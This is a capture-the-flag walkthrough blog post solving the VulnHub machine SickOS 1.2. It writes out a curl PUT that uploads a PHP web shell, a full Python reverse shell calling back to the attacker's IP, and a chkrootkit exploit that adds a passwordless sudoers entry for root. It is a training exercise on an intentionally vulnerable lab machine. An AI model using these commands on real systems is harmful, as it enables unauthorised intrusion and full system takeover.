Capture the flag (CTF)

SickOS 1.2: Walkthrough

May 11, 2017 by Chiragh Dewan

SickOS 1.2 surfaced on VulnHub on April 21st, 2016. Created by D4rk, it can be found at https://www.vulnhub.com/entry/sickos-12,144/. It is the second machine in the SickOS series. Running Ubuntu Operating System, the objective is to get contents of /root/7d03aaa2bf93d80040f3f22ec6ad9d5a.txt.

For the attacking machine, I will be using Kali 2017.1.

Once booted, this is what the machine looks like:

We start the attack by finding the IP of the victim machine by using the netdiscover command:

$ netdiscover

Now that we know our target IP, let us start by scanning the ports and try to get more information about it:

The scan shows us that the following ports are open:

  • Port 22 – Running OpenSSH
  • Port 80 – Running lighttpd

Let us head over to the browser to see if we find something useful:

After going through the source code of the page, I do not find anything useful. Let us fire up dirbuster to see if the server is hiding anything from us:

A quick result shows us a directory /test/ that is present:

Heading over to the directory, it is a blank directory listing.

Since dirbuster too has not come up with anything else so far, why not see what all we can do with this link? Hitting a simple cURL request to this link would be able to tell us a lot more than we know:

$ curl -v -X OPTIONS http://172.16.92.137/test

Well, that interesting! As we can see, the method PUT is allowed on the URL meaning we can create a new resource:

$ curl -v -X PUT -d ‘<?php system ($_GET[“cmd”]); ?>’ http://172.16.92.137/test/shell.php

The above query will create a file shell.php in /test/ directory along with the PHP code we added to get us a command line:

In addition, we have partially exploited the vulnerability! Now let us try to get a reverse shell:

I will be using the following Python reverse shell (more can be found at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet ):

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“172.16.92.133”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Now let us start a listener on port 443 and send the above shell in the previous link we exploited:

$ curl “http://172.16.92.137/test/shell.php?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22172.16.92.133%22%2C443))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27”

Note: I tried to use port 444 and 4444, but it did not work as they are blocked.

Voila, we have a low privilege shell:

Now let’s explore the system and see what else is there we can exploit to become root. After some time, I stumbled upon something really interesting in /, etc./cron.daily:

cron.daily is where all the cron (automatic) jobs that need to be performed by the server on a daily basis are present, and here I can see a chkrootkit. On further examination, I see that the version of chkrootkit in question is 0.49!

After some research, it has a known vulnerability and can be exploited. I used the following exploit: https://www.exploit-db.com/exploits/33899/

$ echo ‘chmod 777 /etc/sudoers && echo “www-data ALL=NOPASSWD: ALL” >> /etc/sudoers && chmod 440 /etc/sudoers’ > /tmp/update

A file update would be created in /tmp/. Give that file the following permissions:

$ chmod 777 /tmp/update

Once done, wait for a couple of minutes and then type:

$ sudo su

Now we have root! Let us head over and read the flag.

Posted: May 11, 2017
Author
Chiragh Dewan
View Profile

A creative problem-solving full-stack web developer with expertise in Information Security Audit, Web Application Audit, Vulnerability Assessment, Penetration Testing/ Ethical Hacking as well as previous experience in Artificial Intelligence, Machine Learning, and Natural Language Processing. He has also been recognised by various companies such as Facebook, Google, Microsoft, PayPal, Netflix, Blackberry, etc for reporting various security vulnerabilities. He has also given various talks on Artificial Intelligence and Cyber Security including at an TEDx event.

Leave a Reply

Your email address will not be published.